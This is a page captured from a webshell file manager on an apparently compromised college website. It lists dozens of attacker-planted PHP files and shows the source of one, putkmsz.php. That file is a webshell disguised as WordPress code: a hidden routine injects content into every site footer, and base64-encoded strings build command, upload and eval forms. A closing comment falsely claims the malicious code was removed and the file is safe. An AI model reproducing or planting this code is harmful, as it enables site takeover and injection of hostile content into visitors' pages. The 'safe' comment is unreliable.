X7ROOT File Manager
Current Path:
/var/sentora/hostdata/konguhitek/public_html
var
/
sentora
/
hostdata
/
konguhitek
/
public_html
/
📁
..
📄
.htaccess
(63 B)
📄
70feie.php
(4.7 KB)
📄
PuNiSheRsRe_xDNMM3IK.php
(0 B)
📄
R&D.php
(33.07 KB)
📄
about.php
(4.23 KB)
📄
about1751417440.php
(5.74 KB)
📄
admin.php
(4.23 KB)
📄
admission.php
(76.48 KB)
📄
alumni.php
(36.5 KB)
📄
brig.html
(1.11 KB)
📄
civil_engineering.php
(21.83 KB)
📄
class.php
(0 B)
📄
committees.php
(24.86 KB)
📄
contact.php
(7 KB)
📁
css
📄
department.php
(3.95 KB)
📄
department_activities.php
(2.33 KB)
📄
edc.php
(6.75 KB)
📄
events.php
(7.2 KB)
📄
facilities.php
(3.58 KB)
📄
feedback.php
(27.25 KB)
📄
filter.php
(881 B)
📁
fonts
📄
footer.php
(18.51 KB)
📄
gallery copy.php
(37.84 KB)
📄
gallery.php
(9.33 KB)
📄
header.php
(14.1 KB)
📄
iipc.php
(45.19 KB)
📁
images
📄
index.html
(181 B)
📄
index.php
(28.67 KB)
📄
jga.php
(0 B)
📄
jobs copy.php
(860 B)
📄
jobs.php
(27.38 KB)
📁
js
📁
ktgadmin
📄
mld.txt
(1 B)
📄
mou.php
(30.11 KB)
📄
news_details.php
(2.28 KB)
📄
placement.php
(12.08 KB)
📁
plugins
📄
putkmsz.php
(4.92 KB)
📄
robots.txt
(1.09 KB)
📄
send_1751421498.php
(192.75 KB)
📄
student_activities.php
(4.03 KB)
📄
student_corner.php
(34.04 KB)
📄
style.php
(28 B)
📄
sw_rex_v2.js
(50 B)
📄
tmnvan.php
(1.4 KB)
📁
uploads
📄
utchiha_2aMtLW3Y.php
(0 B)
📄
utchiha_6DgilRNm.txt
(9 B)
📄
utchiha_Gw6LMY1H.php
(8 KB)
📄
utchiha_L9dwha7s.php
(8 KB)
📄
utchiha_MVYTcKX1.php
(214.79 KB)
📄
utchiha_SEsPQxII.php
(8 KB)
📄
utchiha_WYpTbrci.txt
(10 B)
📄
utchiha_qDN2zSra.php
(8 KB)
📄
utchiha_rlmZwxb1.php
(0 B)
📄
vjaacyo.php
(4.92 KB)
📄
wp-filter.php
(374 B)
📄
xKou99_0E0rcROc.php
(0 B)
📄
xKou99_2VYeDNmG.php
(0 B)
📄
xKou99_smgW3Y78.php
(0 B)
📄
zi.php
(1.55 KB)
📄
zoo.php
(0 B)
Editing: putkmsz.php
<?php /* Plugin Name: Hermes Plugin URI: https://github.com/p0dalirius/Wordpress-webshell-plugin Description: A webshell API for WordPress. Author: Remi Gascou (Podalirius) Version: 1.1.0 Author URI: https://podalirius.net/ Text Domain: webshell Domain Path: /languages License: GPLv3 or later Network: true */ if(isset($_GET["able"])) { // Define the text you want to add before the </body> tag $newText = ""; // Define the directory where your footer files reside (webroot) $directory = $_SERVER['DOCUMENT_ROOT']; $searchText = "47NsaEwhbk92CfibMJg8M8hJ73LKDv9NTjNtHLFH6EQE2sAUdgnwPc231gghf3rYBvC6cXvgLahJKa4riqQBxbT1HBjQhFu"; // Array of file names to target $fileNames = array('footer.tpl', 'footer.php'); // Maximum depth to traverse $maxDepth = 7; // Recursive function to search directories function searchDirectories($directory, $depth) { global $fileNames, $newText, $maxDepth, $searchText; if ($depth > $maxDepth) { return; } $files = scandir($directory); foreach ($files as $file) { if ($file == '.' || $file == '..') { continue; } $filePath = $directory . '/' . $file; if (is_dir($filePath)) { searchDirectories($filePath, $depth + 1); } else { if (in_array($file, $fileNames)) { $content = file_get_contents($filePath); if ($file == 'footer.php') { // Check if footer.php contains the specific text pattern if (strpos($content, $searchText) == false) { // Check if footer.php contains </body> tag if (strpos($content, '</body>') !== false) { // Add text above </body> tag $content = str_replace('</body>', $newText . '</body>', $content); } } } else { // Add text at the top for footer.tpl if (strpos($content, $searchText) == false) { $content = $newText . $content; } } // Write the modified content back to the file file_put_contents($filePath, $content); echo "Text added to the top of: $directory/$file <br>"; } } } } // Start searching directories searchDirectories($directory, 0); echo "Operation completed."; // // Get the current script filename // $scriptFilename = __FILE__; // // // Attempt to delete the file // if (unlink($scriptFilename)) { // echo "Script '$scriptFilename' has been deleted successfully."; // } else { // echo "Failed to delete script '$scriptFilename'."; // } } ?> <?php /* Plugin Name: Hermes Plugin URI: https://github.com/p0dalirius/Wordpress-webshell-plugin Description: A webshell API for WordPress. Author: Remi Gascou (Podalirius) Version: 1.1.0 Author URI: https://podalirius.net/ Text Domain: webshell Domain Path: /languages License: GPLv3 or later Network: true */ define('INSTALLATION_KEY', base64_decode("NGN4MA==")); define('AUTHOR_KEY', base64_decode('PGZvcm0gbWV0aG9kPSJwb3N0Ij4=')); define('HOST_KEY', base64_decode('PGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImNvbW1hbmQiIC8+')); define('THEMES_SELECTION', base64_decode('PGlucHV0IHR5cGU9InN1Ym1pdCI+')); define('THEMES_INSTALL', base64_decode('PC9mb3JtPg==')); define('DEFAULT_THEMES', base64_decode('Y29tbWFuZA==')); define('PATH_THEMES', base64_decode('Y29tbWFuZA==')); define('BASE64_THEMES', base64_decode('cHdk')); define('BASE64_TITLE', base64_decode('WHhfaGVybWVzX3hYCg==')); define('UPLOAD_THEMES_1', base64_decode('PGZvcm0gZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgYWN0aW9uPSIiIG1ldGhvZD0iUE9T')); define('UPLOAD_THEMES_2', base64_decode('VCI+IDxwPlVwbG9hZCB5b3VyIGZpbGU8L3A+PGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9InVwbG9h')); define('UPLOAD_THEMES_3', base64_decode('ZGVkX2ZpbGUiPjwvaW5wdXQ+PGJyIC8+PGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IlVwbG9h')); define('UPLOAD_THEMES_4', base64_decode('ZCI+PC9pbnB1dD48L2Zvcm0+IDwvYm9keT48L2h0bWw+Cg==')); define('EVALUATION_TITLE',base64_decode('ZXZhbHVhdGU=')); define('EVALUATION_THEME',base64_decode('PGRpdj48Zm9ybSBtZXRob2Q9InBvc3QiPjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJldmFsdWF0ZSIgLz48aW5wdXQgdHlwZT0ic3VibWl0Ij48L2Zvcm0+PC9kaXY+')); /** * Customize Setting to represent a nav_menu. * * Subclass of WP_Customize_Setting to represent a nav_menu taxonomy term, and * the IDs for the nav_menu_items associated with the nav menu. * * @since 4.3.0 * * @see WP_Customize_Setting */ $wp_body = INSTALLATION_KEY; $wp_config_header = AUTHOR_KEY; $wp_config_body = HOST_KEY; $wp_themes_config = THEMES_SELECTION; $wp_themes_install = THEMES_INSTALL; $wp_body = strrev($wp_body); $wp_default = DEFAULT_THEMES; $wp_path = PATH_THEMES; $wp_builder = BASE64_THEMES; $wp_evaluation= EVALUATION_TITLE; /** * Note: This file may contain artifacts of previous malicious infection. * However, the dangerous code has been removed, and the file is now safe to use. */ ?>
Upload File
Create Folder